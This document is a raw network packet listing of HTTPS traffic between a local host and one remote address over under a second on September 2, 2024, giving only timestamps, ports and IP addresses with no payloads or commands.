Sep 2, 2024 08:21:14.034697056 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034735918 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.034763098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034801960 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035068035 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035099983 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035115957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035121918 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035140991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035155058 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035279036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035317898 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035322905 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035329103 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035356998 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035356998 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035371065 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035376072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035393953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.035396099 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035449982 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.035455942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.036465883 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.036484957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.071264029 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.071310997 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.071398020 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.071424007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.071434975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.072679043 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.119735956 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.119784117 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.119851112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.119849920 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.119882107 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.119903088 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.119903088 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.119905949 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.119936943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.119940996 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.119949102 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.119992018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120012999 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120021105 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120038986 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120048046 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120069981 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120110035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120112896 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120122910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120160103 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120250940 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120281935 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120292902 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120299101 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120325089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120366096 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120374918 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120379925 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120400906 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120403051 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120450974 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120456934 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120496988 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120524883 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120554924 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120563030 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120573997 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120589018 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120599031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120642900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120712042 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120743036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120758057 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120764971 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120781898 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120852947 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120894909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120903969 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.120909929 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.120935917 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121052980 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121088982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121095896 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121102095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121133089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121197939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121239901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121243000 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121252060 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121262074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121270895 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121336937 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121341944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121449947 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121479988 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121493101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121499062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121517897 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121540070 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121639013 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121695995 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121702909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121709108 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121737003 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121751070 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121772051 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121799946 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121817112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121824980 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.121843100 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.121853113 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.123960018 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.153995991 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.154031038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.154102087 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.154131889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.154145002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.156656027 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202459097 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202505112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202517033 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202532053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202553988 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202567101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202578068 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202583075 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202594042 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202609062 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202636957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202641010 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202646971 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202672958 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202688932 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202694893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202713013 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202725887 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202744961 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202792883 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202820063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202863932 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202928066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202964067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.202974081 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.202979088 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203007936 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203037977 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203088045 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203138113 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203181982 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203265905 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203300953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203310966 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203315973 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203334093 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203337908 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203360081 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203366041 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203385115 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203511000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203541994 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203550100 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203556061 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203579903 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203769922 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203809023 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203810930 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203820944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203856945 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203864098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203874111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203902006 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203912973 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203912973 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203924894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203949928 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203955889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.203994036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.203999996 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204022884 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204039097 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204044104 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204066992 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204071045 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204104900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204113007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204211950 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204241037 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204248905 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204256058 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204278946 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204296112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204459906 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204502106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204511881 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204543114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204550982 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204556942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204576969 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.204577923 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204615116 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.204622030 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.206017971 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.206034899 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.237270117 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.237353086 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.237390041 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.237441063 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.285583973 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.285656929 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.285697937 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.285751104 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.285861969 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.285907030 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.285907984 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.285919905 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.285953999 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.285968065 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286009073 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286011934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286019087 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286046028 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286060095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286062002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286071062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286103010 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286108017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286117077 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286144018 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286154985 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286159039 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286164999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286194086 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286195040 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286241055 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286242962 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286252975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286282063 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286298990 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286344051 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286353111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286361933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286391973 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286397934 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286422968 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286523104 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286554098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286556005 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286562920 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286597013 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286731958 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286767960 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286782980 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286791086 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286801100 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286842108 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286890030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.286897898 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.286937952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287118912 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287153006 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287161112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287168980 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287198067 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287205935 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287250042 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287260056 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287276030 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287321091 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287415028 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287458897 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287461042 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287471056 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287492990 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287511110 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287513971 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287523985 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287559986 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287744045 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287775993 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287787914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287795067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287817955 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287923098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.287964106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.287971973 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.288008928 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.288077116 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.288116932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.288120985 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.288126945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.288161039 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.288168907 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.290824890 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.319744110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.319835901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.319904089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.319920063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.319935083 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.319962978 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.325264931 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368382931 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368434906 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368474960 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368484974 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368514061 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368527889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368530989 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368541002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368562937 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368568897 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368577957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368602991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368608952 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368621111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368633032 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368658066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368659973 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368670940 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368705034 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368807077 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368840933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368854046 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368861914 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368875980 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368880033 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368911982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368926048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368932962 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.368959904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.368973017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369008064 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369010925 CEST	49744	443	192.168.2.6	84.32.84.152
